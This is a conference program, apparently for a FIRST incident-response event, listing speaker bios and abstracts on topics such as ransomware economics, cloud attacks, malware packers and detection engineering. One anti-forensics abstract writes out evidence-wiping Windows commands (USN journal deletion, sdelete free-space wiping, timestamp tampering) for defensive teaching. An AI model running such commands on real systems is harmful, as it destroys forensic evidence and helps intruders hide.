Program Agenda

Trey Darley has been a long-standing member of the FIRST community, and has served a variety of volunteer roles, including a term on the FIRST board, during which he co-founded the FIRST standards committee. Trey is well known for his work on open cybersecurity standards like STIX/TAXII and others. He's also been aligned with the Langsec faction for many years. Trey's patron saints are Grace Hopper, Evi Nemeth, and Paul Erdös.

Mr. Millar has served in CISA since 2009, working to strengthen the nation's cyber defenses and resilience against emerging threats. His work has included increasing the level of public, private and international partner engagement, and supporting initiatives to improve information sharing, such as the standardization of the Traffic Light Protocol. As the Branch Chief of Cyber Resilience within the Cyber Security Division, he oversees CISA's architectural cybersecurity assessments, the Cybersecurity Performance Goals program, and training and standards for assessment performance. Prior to his cybersecurity career, he served as a linguist with the 22nd Intelligence Squadron of the United States Air Force. Mr. Millar holds a Master's of Science from the George Washington University and is a Distinguished Graduate of the National Defense University's College of Information and Cyberspace.

In the face of increasing threats to the stability of the Internet and our other critical infrastructure, it's crucial for FIRST community members to know how to best build and leverage their personal networks to collectively respond to all types of incidents, especially those that seek to disrupt our supply chains and national critical infrastructure. In this presentation, attendees will learn how to make the most of their FIRST membership by building stronger connections with their community partners, creating strong trusted relationships that go deeper than simply being part of a shared workspace or a mailing list.

Eireann Leverett is the CTO of Killara Cyber, and a long time to collaborater to FIRST. He has risen through the roles of penetration tester, incident responder, researcher, and risk analyst to his current role. He has written many articles and one book, and has a deep interest in critical infrastructure, technology and risk, and catastrophe economics. He's like the little kid on this panel of international experts, and excited to be at the table!

How much ransomware is out there, and what is the cost to companies?

Economic modelling of cyber crime is not often discussed at FIRST, but perhaps it should be. It impacts everything, from budgets, team numbers, to response strategies, to risk management. If we can accurately model cyber crime costs, we can unify responses across countries, or collaborate more effectively. It also helps with scaling the maturity of teams within FIRST. This presentation is about constructing, using, releasing, and validating an open source ransomware economics model. It is also about the challenges, the data, and the quantification tasks required to do so. Partnering with financial institutions isn't easy, but it does help us get our ideas of how to respond to cyber crime across.

Are you a regulator, or a cyber insurer? Are you an incident responder or data scientist who is model curious, or a willing code contributer? Help us make useful models, and use them to help solve the ransomware crisis.

Stephan Berger has over a decade of experience in cybersecurity. Currently working with the Swiss-based company InfoGuard, Stephan investigates breaches and hacked networks as Head of Investigation of the Incident Response team. An avid Twitter user under the handle @malmoeb, he actively shares insights on cybersecurity trends and developments. Stephan also authors the blog DFIR.ch, where he provides in-depth analysis and commentary on digital forensics and incident response. Stephan has spoken at numerous conferences, sharing his expertise with audiences worldwide.

In this talk, we'll dissect common anti-forensics strategies -- like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates -- and reveal how they are often executed ineffectively or misunderstood. We'll explore practical examples, such as:- Deleting the USN Journal (fsutil usn deletejournal /d C:) and why it's rarely a perfect solution.- Clearing shellbags to wipe file explorer history but failing to account for deeper registry artifacts.- Time stomping (Get-Item "C:pathtofile.txt").CreationTime = "2022-01-01 00:00:00) and how forensic tools detect inconsistencies.- Disabling last access time updates (fsutil behavior set disablelastaccess 1) and its limited effectiveness against comprehensive timeline analysis.- Wiping MFT free space (sdelete -z C:) while ignoring the traces left behind in unstructured data.From registry edits like masking user account activity to configuring Windows EFS, we'll examine why these techniques often fail against modern investigative workflows and how defenders use these "footprints of erasure" to uncover malicious intent.Attendees will gain a comprehensive understanding of what works and what doesn't and how to identify these techniques during incident response. Whether you're an IR consultant, security analyst, or blue teamer, this talk offers actionable knowledge to outsmart adversarial anti-forensics tactics.We use Python code to show how 'clean' evidence cleaning can be done, e.g., if only individual MFT entries are deleted or even if entries in the SRUM database are deleted or manipulated. This means it is not immediately obvious that the data has been manipulated, unlike when everything is deleted.

I have been working in the DFIR field in Korea for over 10 years. Our company's DFIR analyst organization is the largest single organization in Korea, and I am the head of that organization. I have analyzed and solved famous digital forensics cases in Korea, and currently, I analyze and respond to breaches using digital forensics, track attackers, and collaborate with Korean investigative agencies to catch criminals.

Until this moment, our primary perspective on defense has been organizations. The defense of individual attacks, introduced in this presentation, is different, and they should be different from the organizational defense. So far, there have been limited methods to counter individual attacks, and even ineffective. That's mainly because the methods vary by case. In the hopes of opening up a discussion between global analysts to seek new methods (building bridges) to protect individuals rooted in the previous security experience (walls) that protected organization, just like the theme of ?Fortresses of the Future: Building Bridges, Not Walls?, this presentation covers how the attackers build infrastructure and use them, monitor individual victims, methods of stealing cryptocurrencies, and behaviors related to their attacks through digital forensics analysis.

Senior Threat Analysis Specialist at CERT PL, currently working on automated vulnerability discovery techniques. Before becoming a security specialist, he was a software engineer with more than ten years of experience. Teaches offensive security at the University of Warsaw. Formerly a CTF player, playing with the p4 CTF team. Likes cats and bad puns.

Since the beginning of 2023, CERT PL has been periodically scanning more than 900 thousand domains and IP addresses of universities, hospitals, government institutions, schools, banks and other organizations, and detecting hundreds of thousands of vulnerabilities and misconfigurations (including high-severity ones, such as SQL Injection, in important entities).For that task we built a custom tool: Artemis (https://github.com/CERT-Polska/Artemis). It checks various aspects of website security and builds easy-to-read messages informing organizations about the scanning results.During the presentation, I will show how Artemis works, what we are looking for, and most significantly - lessons we've learned during our large-scale scanning project. As the tool is open-source, I will touch upon how to set up your own scanning pipeline.

Bonnie Limmer is the Chief of Production within the Cybersecurity Division of the Cybersecurity and Infrastructure Security Agency (CISA). Evolving in this role for the past 10 years, Bonnie started her federal career within the legacy US-CERT organization. Currently, her team leads CISA's cyber information sharing mission to create, coordinate, and release operational cyber alerts, advisories, and guidance on known cyber threats and vulnerabilities impacting government and critical infrastructure networks. Her role is at the center of CISA cyber operations to respond to cyber incidents that impact national security. It's a chaotic and exciting mission space, and a place where adrenaline junkies can thrive.

Keir is the Head of Strategic Response at the UK's National Cyber Security Centre (NCSC-UK). He focuses on developing the NCSC-UK and UK Government response to significant cyber events in order to reduce harm to the wider UK ecoystem. Keir sees partnership, collaboration and community as the best way of tackling our common set of challenges. Keir has been with NCSC-UK since its foundation in 2016, having previously worked in incident response in the NCSC's precursor organisation, CERT-UK. Keir has had wide experience at both a technical and strategic level in dealing with a variety of prominent cyber events with significant impact in both the UK, and across the globe.

When government cyber agencies release a cybersecurity advisory, especially an advisory that is co-sealed with multiple international government partners, it represents the collaboration, combined insights, and expertise of a global coalition. The coordination that goes into these advisories is an intricate dance. These joint advisories are not just a collection of data points; they are meticulously crafted with input from a broad spectrum of partners and perspectives, including industry leaders and international counterparts. This session will provide a rare glimpse into the intricate, collaborative process behind these advisories -- highlighting how the panelists, together with their partners and within their organizations, prioritizes accuracy, relevance, and actionable guidance.

Former Police Officer from Argentina, now a Cloud Incident Responder and Security Engineer with over 10 years of IT experience. A Digital Nomad an international speaker, I've presented on Cloud Security and Incident Response at Ekoparty, FIRST, Virus Bulletin (three times), Hack.Lu, and various BSides events worldwide. I hold a Bachelor's degree in Information Security and an MBA (Master in Business Administration).

In this technical, demo-driven session, we'll explore the tactics and techniques attackers use to compromise infrastructures in Amazon Web Services (AWS), from initial access to achieving advanced persistence. Using known threat actor techniques in an adversary emulation approach, we'll examine common attack vectors such as credential exploitation, privilege escalation, and lateral movement, along with advanced persistence methods that allow attackers to maintain control of compromised environments. Defensive and detection strategies will be highlighted, leveraging both AWS-native services and external tools, helping security teams strengthen their defenses. This session promises a practical, real-world experience for attendees.

Tung-lin Lee is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at several industry conferences, including HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.

In our journey of developing an attack path analysis tool for Azure, we encountered several obstacles, primarily derived from outdated and unclear documentation of Entra APIs which is partially mitigated by the amazing open-source project Bark. However, the issue was further compounded by API permission misalignments across different APIs, such as the Provisioning API and Azure AD Graph API.In addition, the rising prevalence of research into undocumented APIs reveals a neglected attack surface. Moreover, we discovered that the token redemption mechanisms behind the Azure Portal present additional attack vectors. By manipulating the mechanisms, threat actors would abuse multiple undocumented APIs & expand Microsoft Graph permission scopes after obtaining a single refresh token.To address these risks, we are developing an open-source framework for precise identity risk assessments in Azure and laying the groundwork for building safer security solutions.

Denys Yashchuk - Deputy Chief at CERT-UA. Leads the Threat Intelligence and Malware Analysis team, specializing in proactive threat detection and analysis. Work for CERT-UA for over six years. Possesses extensive experience in cybersecurity, with a particular focus on threat analysis, hunting, clustering, cyber attacks attribution and intelligence sharing.

The full-scale invasion of Ukraine by Russia is accompanied by a significant number of cyberattacks.We have unique experience in defending ourselves against cyberattacks with different severity, investigating various cyber incidents, from phishing to intrusions into networks.Clustering cyber threats helps organize information, making it easier to share details and provide context, so everyone understands the nature of the threat.During the presentation, we will talk about CERT-UA's classification (UAC-XXXX) of cyber threats and how it correlates with widely known names. The main part of it will describe the most active clusters, their TTPs, and present real cases of attacks. In the end, we will talk briefly about the main causes and vulnerabilities in security systems that make cyber-attacks possible and how to handle them.

Anne Connell is a Senior Cybersecurity Engineer with the Cybersecurity Risk & Resilience Directorate of the CERT Division at Carnegie Mellon University’s (CMU) Software Engineering Institute (SEI). Anne contributes to research and development that is focused on improving the security and resilience of the Nation’s critical infrastructure and assets. Anne has over 20 years of experience in cybersecurity model and assessment development, data privacy program development, resilience management, software development, and instructional design. She has led the development of products for CISA, DHS, DoE, DoD, and other federal law enforcement communities.
Anne’s contributions to CERT include creating data privacy programs, framework development for implementing privacy standards, data breach incident response, and protecting incident related data. She also creates custom cybersecurity training solutions for sponsors, requirements gathering, and application development. Anne’s research focus is to address privacy and cybersecurity concerns in a manner that protects our work partners and complies with regulations. This area consists of compliance management, transactional issues, and data breach response. Anne holds certifications in CISSP and CIPM. Anne was the project lead of the FBI Cyber Investigator Certification Program (CICP), developed for the 750,000 LEO members on cybersecurity investigations. Anne is an instructor of Privacy in the Digital Age at the CMU Heinz College of Information Systems and Public Policy, and is an active speaker at Pittsburgh Public Schools to educate students on the internet and social media. Anne holds a bachelor's degree in Information Systems and a master's degree in Human and Computer Interaction from Carnegie Mellon University.

Lauren Cooper is a member of the technical staff in the Cybersecurity Risk and Resilience directorate at the Software Engineering Institute, CERT Division, a federally funded research and development center operated by Carnegie Mellon University. She began her career in IT operations, before shifting her focus to information security. She earned her MS in Information Security Policy and Management from Carnegie Mellon University, where she was a Scholarship for Service awardee, a competitive scholarship program sponsored by the United States government. Her favorite areas of research include privacy, community approaches to cybersecurity, security of 5G and future networks, cybersecurity strategy, security by design in complex systems, and understanding and integrating human factors in security and privacy.

Organizations employ social media platforms for a variety of communication purposes, including sharing industry news and generating website traffic. According to the Pew Research Center News Platform Study, 54 percent of U.S. adults say they at least sometimes get news from social media. The almost instantaneous speed of social media to reach a broad audience makes it a communication outlet well adapted for dissemination of information about data breaches and response status, as well as for combatting misinformation. Many threat actors have found success manipulating social media to target organizations with the intent to damage, disrupt, or destroy trusted communications channels, brand reputation, or financial standing. Communication on social media about an organization's data breach or disclosure can have far-reaching consequences. Management's understanding of how to navigate the aftermath of such a breach is essential to its success in preserving and building the organization's real-world reputation and security. CERT, a division of the Software Engineering Institute (SEI) at Carnegie Mellon University, in this presentation will spotlight case studies using evidence gathered from social media, and conclude with specific and practical incident response recommendations (best practices) how organizations can address data privacy breaches and disclosures proactively.

Eirik is a team lead for Vulnerability and Exposure management in the Equinor Cyber Defense Center with many years of hands-on experience in incident response and penetration testing.

Anders Nese is an experienced incident responder who now heads up the cyber engineering team in the Equinor Cyber Defense Center.

Traditional vulnerability management often feels like a never-ending game of whack-a-mole, where security teams become the "security police" through ticketing systems or manual follow-ups. After years of struggling with this approach, we discovered that the real challenge wasn't in collecting vulnerability data -- it was in making that data meaningful and actionable for everyone involved.This talk shares our journey of transforming vulnerability management from a security team problem into an organizational collaboration, through the development of a visualization and prioritization platform that emphasizes human factors over pure metrics. We'll explore how this shift in perspective led to better engagement from risk owners, more efficient remediation processes, and ultimately, a stronger security posture.Learn how we moved beyond traditional approaches to create a system that turns overwhelming security data into clear, actionable insights that resonate with both technical and non-technical stakeholders. This presentation will provide practical insights for security teams struggling with vulnerability management at scale, offering both strategic approaches and tactical implementation details that can be adapted to various organizational contexts.

Gary Sun is a cyber security software engineer of the Engineering and Development Team at CyCraft Technology. Currently, he focuses on research on active directory security and cloud security. He graduated from National Yang Ming Chiao Tung University with master degree in Network Engineering. He has publish papers in CISC 2021 && 2022. Also, he is a speaker of Sans Blue Team Summit, AVTokyo, HITCON Enterprise and CyberSec.

Vivian Teng is a detection and response analyst on customer success team at CyCraft Technology. She is responsible for the Active Directory analysis and provide Best Practice to solidfy the security for customers. She has publish research in ACM Advances in Social Network Analsisys and Mining, as well as NTCIR16 (NII Testbeds and Community for Information Access Research).

Active Directory (AD) is a critical role of identity and access management for organizations, serving as the backbone for authenticating users and managing access to resources. Thus, AD is a popular target for attackers. According to DEVCORE, a professional red team company, 72% of AD environments are successfully compromised during red team assessments. It shows that it is easy for attackers to compromise AD. We investigate real world cases, finding that misconfigurations, such as excessive permissions and weak segmentations, are common root causes behind these vulnerabilities.In this talk, we explore real-world cases to reveal how industry-specific needs shape AD configurations across three sectors -- Finance, Government, and Technology. We conclude six common permission settings observed in corporate environments. We would discuss real world cases and statistical insights into these configurations. These insights emphasize the critical need for permission management, segmentation, and access control to mitigate risks and secure AD environments effectively.Lastly, we would provide actionable recommendations to address these misconfigurations and protect organizations from potential breaches. Attendees will gain knowledge about industry-specific AD configuration challenges, common risky permissions, case studies on misconfigurations, and actionable strategies to strengthen AD security.

Anthony has over 24 years of experience in cybersecurity and the last 17 years focused on nation state and sophisticated adversaries. Anthony developed the Cyber Hunt program at Johns Hopkins Applied Physics Laboratory and current manages the Cyber Hunt, Applied Cyber Research, and Architecture & Engineering.

Todd has over 12 years of experience in cybersecurity and is the Lead Cyber Analyst on the Applied Cyber Research team at Johns Hopkins Applied Physics Lab. Todd leads the end point behavioral analysis and uses behavioral patterns to proactively hunt for malicious activity in the enterprise.

The focus of this presentation is exploring the limitations of traditional SIEMs and how we have engineered solutions around these limitations at Johns Hopkins University Applied Physics Laboratory. SIEM's are designed for a single query and basic correlation and using the returned data becomes problematic, especially if there are thousands of results or more. These common approaches in SIEM's are often impossible techniques to use to identify sophisticated adversaries. We will illustrate how we use our SIEM, PowerShell, Python, SQL, SOAR, and other methodologies to create and combine more complex analytics that is impossible to complete in any existing SIEM.

Yuta Sawabe is a SOC analyst at NTT Security Holdings, where he is primarily involved in log analysis and malware analysis. He previously worked on malicious domain names. His is an Information Processing Society of Japan JIP Special Paper Winner (2019). He has spoken at Botconf, HITCON, JSAC and CODE BLUE in the past.

Rintaro Koike is a security analyst at NTT Security Holdings. He is engaged in threat research and malware analysis. In addition, he is the founder of "nao_sec" and is in charge of threat research. He focuses on APT attacks targeting East Asia and web-based attacks. He has been a speaker at VB, SAS, Botconf, AVAR and others.

It is not uncommon for malware and malicious files to carry code signatures, which have become a traded commodity in cybercrime forums. This presentation begins with an overview of the current state of malicious code-signing certificates, including an examination of how these certificates are bought and sold in such forums.Our research uncovered unusual behaviours among sellers dealing in malicious code-signing certificates. By exploiting these behaviours, we successfully predicted the potential misuse of certain code-signing certificates several months in advance. This presentation will detail our methodology, the findings of our analysis, and propose practical measures to combat these sellers.Through this presentation, attendees will gain a comprehensive understanding of the current landscape of malicious code-signing certificates, experimental approaches to address the issue, and effective defence strategies. This knowledge will enable SOC, IR, CSIRT, and other cybersecurity professionals to take proactive measures against malware and malicious files bearing fraudulent code signatures.

John Hollenberger is a cybersecurity consultant with seventeen years of experience in web- and host-based vulnerability assessments, incident response, digital forensics collection, PCI compliance, and Data Loss Prevention with a primary focus on proactive incident response consulting services. John is also the co-author of Cybersecurity Tabletop Exercises: From Planning to Execution.

In his current position, John is a Lead Consultant of Proactive Services, conducting training exercises in Incident Response fundamentals, developing and facilitating tabletop exercises, and reviewing and creating Cybersecurity Incident Response Plans for large corporations, small businesses, and non-profit organizations. John currently holds the following degrees and certifications: BA, CISSP, CISA, CISM, CRISC, GCIH, GWAPT, and Security+.

---

Storyboarding plays a pivotal role in the successful planning and execution of cybersecurity tabletop exercises, which are designed to assess incident response and decision-making within an organization. A well-constructed storyboard acts as a blueprint for the exercise, providing a clear, structured roadmap that guides participants through various injects and decision points. It ensures clarity, consistency, and focus throughout the exercise while outlining objectives, challenges, and potential outcomes. The storyboard's key components include: objectives, which define the purpose and learning goals; scenarios, which describe the unfolding events tailored to the objectives and roles; injects, or planned events that drive the narrative; and key issues, critical junctures where decisions impact the exercise's progression. By incorporating these elements, a storyboard helps create dynamic, engaging simulations that reflect real-world challenges, encourage collaboration, and improve preparedness. This talk will provide participants with the tools to craft their own effective storyboards for their organization's cybersecurity tabletop exercises.

Mike is the Deputy Head of Incident Management Policy & International in the UK's National Cyber Security Centre (NCSC-UK). With a background in national law enforcement and now as a generalist civil servant, he is now responsible for delivering the frameworks for the UK Government response to significant cyber events. Additionally, he proactively seeks and maintains relationships across industry and international partners to ensure collaboration to strengthen the resilience against, and response to, cyber adversaries.

In 2016 when the United Kingdom's National Cyber Security Centre was established, the landscape of those involved in the response to cyber incidents was vast. Flash forward nine years to 2025, this is significantly more crowded and this won't be a phenomenon faced only by the UK. In the face of adversary activity increasing in severity and scale, strong collaboration between government, industry and academia is key to strengthening cyber security resilience - and if it does go wrong - effective response.In this session, we will explore how to navigate the complexities posed by public/private partnerships, with differing duties to clients and often competing entities, to produce world-leading cyber security outputs. Case studies of NCSC-UK's recent successes with academic partners, c-suite engagement and co-sealing with insurance sector colleagues will reflect the opportunities available when sectors come together and operate as one.

Matias Mesiä has worked at NCSC-FI, the Finnish National Cyber Security Center, since 2020 with various responsibilities especially coordinating cases which needed special attention.

In 2024, the city of Helsinki was the victim of a data breach. The attacker stole the personal information of more than 100,000 Helsinki residents. Helsinki is the capital of Finland and the largest employer in Finland. The breach occurred in the city's education department.This presentation gives an insight into what happened and the role of NCSC-FI in this type of critical cyber incident. The cooperation between the city, NCSC-FI, ICT service providers and the police is crucial in such cases. What happens when the incident is in the media and the investigation is still ongoing? There are many lessons to be learned from this case. From keeping your environment up to date to dealing with the media.

Yasuyuki Tanaka, Ph.D, CISSP, GREM is currently engaged in vulnerability and malware analysis at NTT-CERT. Additionally, he teaches malware analysis techniques at a university.

The code interpretation capabilities of LLM, especially GPT4, are remarkable. On the other hand, the problem is that it contains errors that are difficult to confirm. The same is true for malware code analysis, and quantitative and comprehensive evaluation has not been performed. In this paper, we created a dataset that covers all the behaviors used in many malware, and quantitatively and comprehensively clarified the malware code interpretation performance of GPT4 through experiments. We obtained disassembly code and decompiled code for the corresponding functions for 35 categories and 233 typical malware behaviors, and had GPT4 interpret the code to analyze whether each behavior could be identified. As a result, 70% of the behaviors in the decompiled code and 8% of the behaviors in the disassembly code could be identified. We explain the specific behaviors that could and could not be identified for each. We present eight findings obtained by classifying and analyzing each behavior into three categories: method and logic, Windows specifications, and algorithms, and discuss future challenges.

Daniel Bunce is a Principal Malware Reverse Engineer at Unit 42 within Palo Alto Networks. He's mostly focused on analyzing malware linked to incident response cases, reverse engineering malicious code and identifying the TTPs used by cybercriminals. In addition to his professional role, Daniel is invested in the development of reverse engineering courses. He designs and delivers training programs such as Zero2Automated, which aim to educate and prepare individuals interested in the field.

As a dedicated malware reverse engineer at Palo Alto Networks' Unit 42, I specialize in uncovering the mechanics behind cyber threats, focusing on crimeware and APT-level malware. Each day involves a deep dive into disassembled code or building custom scripts to extract Indicators of Compromise (IOCs) that support defensive efforts. Outside of cybersecurity, I love music (building my vinyl collection), weight training, and reading sci-fi or fantasy books.

In June 2024, Unit 42 began tracking a new Packer-as-a-Service operation, self-titled "HeartCrypt", which was sold across several forums and Telegram accounts. Through our research, we've identified over 2,000 malware samples packed with HeartCrypt, comprising over 45 malware families in the last 10 months. The malware families packed by HeartCrypt range from commodity malware such as Remcos and LummaStealer, to pre-ransomware deployment tooling leveraged by high-level ransomware group affiliates, such as BlackSuit and Hive Ransomware.HeartCrypt provides threat actors with a low-cost entry of only $20 USD per "crypt", and a moderately sophisticated approach to malware payload crypting, which explains the high adoption rate over the past several months. Elements of polymorphism, control flow obfuscation, and EDR/AV evasion techniques are present within HeartCrypt, and while the core packer is rudimentary in nature, it is highly successful in evading both scantime and runtime anti-malware scanners.This talk will explore the inner workings of HeartCrypt, covering its evasion techniques, obfuscation methods, and development timeline - from the early stages, to its use in recent LummaStealer Fake Captcha campaigns. We'll conclude by examining the threat actor behind this packer-as-a-service, specifically focusing on sales channels and underground forum activity. We'll also be sharing YARA rules developed to track every sample of HeartCrypt so far.

Tomohisa is a Lead Cyber Security Architect at a global insurance company, bringing a wealth of expertise across diverse domains of cybersecurity. His professional experience spans global security strategy, security architecture, detection engineering, security operations, threat intelligence analysis, and digital forensics and incident response (DFIR). He has also been involved in red teaming and delivering security training. Tomohisa holds a Doctor of Engineering degree and a broad array of industry-recognized certifications, including CISSP, CSSLP, CCSP, CISA, CISM, CDPSE, and PMP.

Beyond his corporate responsibilities, Tomohisa has made significant contributions to the cybersecurity community. He has served as a speaker, a Cybersecurity Expert Advisor to the Ministry of Internal Affairs and Communications (MIC) in Japan, and a member of the national IT exam committee. He is also a translator and author. Tomohisa has spoken at international conferences such as SANSFIRE 2011 & 2012, DEFCON 24 SE Village, and FIRSTCON23, as well as numerous domestic conferences in Japan. As an author, he has written a book on threat intelligence in Japanese and translated seven security books published by O'Reilly Japan.

Detection Engineering (DE) is a vital aspect of modern cybersecurity operations, aimed at enhancing detection and response capabilities to address the ever-evolving threat landscape. This session presents a structured approach to DE, centered around the Detection and Response Development Lifecycle (DR-DLC) and supported by key frameworks and methodologies. These include the three techniques for improving detection capabilities, the HOPE framework, the VECTOR framework, the 3M+C framework, and three essential metrics (Time, Efficiency, and Coverage) for evaluating and managing an effective DE program. Together, these tools and processes enable a systematic approach to conducting DE and building a robust program.The key takeaway for attendees is a set of actionable strategies and thought toolbox to implement and refine DE practices. Participants will gain practical insights into structured processes and standardized methodologies, equipping them to enhance their organization's detection engineering capabilities effectively.

Dr. Albert Antwi-Boasiako, for more than a decade, has been pioneering cybersecurity development activities in Africa- both in the private sector and in government. Since 2017, Dr. Antwi-Boasiako has led the institutionalisation of Ghana's cybersecurity development, positioning the country in the Tier-1 category (role modelling) of the ITU's 2024 Global Cybersecurity Index.

Stephen is a versatile Technology Manager with nearly 2 decades of experience in ICT infrastructure strategy, planning, design, deployment, and operations. He holds an MBA in Engineering Management from Coventry University, UK and a Bachelor of Engineering (Hons.) in Electronics Engineering from the Multimedia University, Malaysia. He has been a Certified Information Systems Security Professional (CISSP�) since 2011. Stephen�s mandate at the CSA is to help build a Secure and Resilient Digital Ghana through world-class proactive and reactive cybersecurity incident response measures within a framework of global collaboration.

This presentation will discuss considerations for developing a Sectoral CERT ecosystem as part of the wider national cybersecurity strategy and highlight some key learnings from Ghana's approach.

Zivile Necejauskaite is the Director of Marketing and Communication at NRD Cyber Security, a Lithuanian cybersecurity technology consulting and incident response company. With over 15 years of experience as a communication specialist, she has focused the past 7 years on the cybersecurity sector, specialising in impact, change, and crisis communications. In her role, Zivile actively engages with media professionals to enhance public understanding of cybersecurity issues. She has moderated and hosted cybersecurity panels and events both in Lithuania and internationally, including co-hosting the Cyber Defence East Africa conference. Through her efforts, Zivile contributes to strengthening cybersecurity resilience by fostering informed public discourse and promoting best practices in the digital landscape.

Madara Krutova is a representative of CERT.LV, Latvia's Information Technology Security Incident Response Institution. In this role, she actively engages with the media to enhance public awareness of cybersecurity issues. Madara has provided expert advice on safe online shopping practices, especially during peak periods like the holiday season, emphasizing vigilance against cyber threats such as phishing and fraudulent websites. She has also addressed potential increases in Distributed Denial-of-Service (DDoS) attacks during significant events, advising the public on preparedness and response strategies. Through her efforts, Madara contributes to strengthening cybersecurity resilience in Latvia.

Engaging with the media is an essential yet underutilised strategy for fostering cybersecurity resilience. This presentation explores approaches from Latvia and Lithuania, showcasing how different entities can collaborate with media to enhance public understanding of cybersecurity. Latvia's CERT.LV, part of the National Cybersecurity Centre, prioritises providing accurate, evidence-based information to media outlets, addressing the public's reliance on news portals for cybersecurity knowledge. In contrast, Lithuania, lacking a centralised cybersecurity awareness body, provides opportunities for other cybersecurity ecosystem members like NRD Cyber Security to foster media engagement initiatives. The company emphasises educating journalists through collaborative press releases and informal events to counter misconceptions and promote constructive narratives on cybersecurity. By sharing experiences and insights, this session highlights effective tactics to cultivate productive relationships with media professionals. These efforts aim to shift media focus from sensationalised reporting to fostering informed discussions, ultimately empowering the public to adopt cyber-resilient practices.

Matt Gurr is a Senior Security Engineer with the AWS Global Services Security Organisation. In his role, Matt is responsible for a team of incident responders that assist customers during active security events on the customer side of the shared responsibility model. The team is made up of Senior Security Engineers and Solution Architects with experience in performing incident response in AWS. Prior to joining AWS, Matt brings over 25 years of experience in security roles in the banking and finance, government and defense industries. Matt holds a master's degree in Information Technology from Queensland University of Technology (QUT), and industry certifications from ISC2, ISACA, SABSA and SANS organisations. In his spare time, Matt enjoys being outdoors with family and cycling.

AWS strategically partners with Managed Security Service Providers (MSSPs), Independent Software Vendors (ISVs), National Computer Security Incident Response Teams (CSIRTs), and other agencies to amplify and enhance its security and incident response capabilities. This global ecosystem leverages AWS's robust cloud infrastructure while incorporating specialized security expertise and innovative software solutions developed by partners. MSSPs can offer managed security services, continuous monitoring, and rapid incident response, complemented by ISVs who create the cutting-edge security tools and integrations tailored for AWS customer environments. National CSIRTs and other agencies contribute their unique insights and capabilities to this collaborative framework. Together, these partnerships form a comprehensive security ecosystem that addresses evolving threats, ensures compliance, and enables rapid threat detection and mitigation. This multi-faceted approach empowers organizations with robust, highly scalable security solutions, expert management, and seamless integrations, significantly bolstering a customers' overall security posture in the cloud.

Omri is an independent security researcher with over a decade of experience in the field. Previously, he headed a security research group in Fortinet's FortiGuard Labs, focused on OS internals, malware and vulnerabilities. Omri joined Fortinet following enSilo's acquisition, where he was the security research team leader and spearheaded the development of new offensive and defensive techniques. Before that, He led the R&D of unique network and endpoint security products for large-scale enterprise environments and was part of an incident response team, conducting investigations and hunting for nation-state threat actors. Omri is a past speaker in various conferences such as DEF CON, AVAR, BSideLV, BSidesTLV and others.

Following the largest global IT outage in history on last July, which disrupted numerous services and industries, many took to the public stage to advocate against allowing endpoint security vendors to design and deploy agents that are kernel-based, even prompting regulators to weigh in.User mode-based engines are already integral piece of many endpoint-oriented security solutions from different malware analysis tools to various commercial products like AVs, EDRs, sandboxes and more. This kicked off research to map the entire threat landscape to assess the impact of the proposed design shift. Analyzing and reverse-engineering over 40 different malware families and open-source projects yielded an in-depth understanding and insights into attackers' tradecraft.This talk will explore all the unique tactics and techniques which malware authors and red teamers have developed to beat user mode-based protection engines, showcasing their very fundamental design flaw: the reliance on the same execution environment that is intended to be protected. The talk will also highlight drawbacks of the various methods and provide a detection scheme focusing on runtime and forensics indicators to give a leg up to CISRTs, malware researchers and detection engineers facing this issue.

Leigh Metcalf is a Senior Network Security Research Analyst at the Carnegie Mellon University Software Engineering Institute's cybersecurity (CERT) division. She develops cutting-edge information and training to improve the practice of cybersecurity. Before joining CERT, Leigh spent more than ten years in industry working as a systems engineer, architect, and security specialist. Leigh also has a PhD in theoretical mathematics from Auburn University. Leigh has presented research at numerous conferences and is co-author of Cybersecurity: Myths and Misconceptions with Gene Spafford and Josiah Dykstra.

Planning resource management in cybersecurity is difficult and is always affected by the trends. How many vulnerabilities do we expect? How much malware? How many security incidents? Unfortunately, these trends are often affected by multiple causes that are not always related. For example, a new threat actor, a new malware library, a new class of vulnerability, or a new method of finding vulnerabilities. They may be interrelated, they may be unrelated, and they may be unknown, but at the core, they influence how many vulnerabilities, malware, incidents, and other cybersecurity events occur.As an outgrowth of analyzing COVID-19 trends and causes, we developed a new method for modeling multicausal data, which can have disparate underlying causes for the changes in trends. This method has been expanded to prediction, where we predict the point at which the trend in data changes, allowing us to forecast the number of events in the future.

I do ICS/OT security with a focus on attack detection capabilities and purple teaming. I have a pentester background, and have worked extensively across transportation, manufacturing and energy sectors. In my spare time I play around with product/hardware security.

This presentation details the outcomes of a purple teaming exercise with an industrial client, focusing on the security intersections between Information Technology (IT) and Operational Technology (OT) systems.Parts:- Part 1: Assessment background, OSINT, Internet Asset Mapping- Part 2: Initial Foothold (primary and alternative attack paths), Lateral Movement within the IT-DMZ- Part 3: Lateral Movement from IT-DMZ towards Enterprise IT, Lateral Movement from Enterprise IT towards OT- Part 4: OT Environment (Cyber Physical Payloads), Remote Manipulation of Water Tank Levels- Part 5: Conclusion and Countermeasures

Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO). A true cybersecurity enthusiast, Vlad�s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.

As scanning and reconnaissance methods grow more diverse -- from public platforms like Shodan and Censys to hidden probing by botnets and bulletproof hosting services -- security teams need better ways to understand who is on the other side of their network connections. This talk will show how network fingerprinting has developed over time, starting with simple tools like p0f and moving up to more advanced methods like JA4, JA4+, and MuonFP. We'll discuss how these modern fingerprints can help analysts recognize the tools and infrastructure used by attackers, whether they are fast scanners, basic banner grabbers, or connections routed through VPNs and jump servers. You'll learn how to use these fingerprints to strengthen your defenses, protect critical infrastructure, and reduce your visibility to public scanners. We will also explain how to fit fingerprinting into SOC and CSIRT workflows, noting both what it can and cannot do. Attendees will leave with a practical understanding of modern fingerprinting techniques and a few examples they can apply in their daily work.

Cybersecurity professional with 14+ years of experience as IT and security consultant. Certified Incident Handler (ECIH) and Undergraduate education in "Security in ICTs and Communications" (IUPFA). Currently Cybersecurity Innovation Leader at BASE4 Security where he designs initiatives in various areas of cybersecurity that lead to the creation of new capabilities for internal areas of the organization or services and products for third parties. Full Profile: https://www.linkedin.com/in/diegostaino/

